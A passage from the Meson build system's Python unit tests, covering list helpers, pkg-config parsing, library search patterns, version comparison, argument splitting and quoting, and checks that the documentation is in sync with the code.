self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
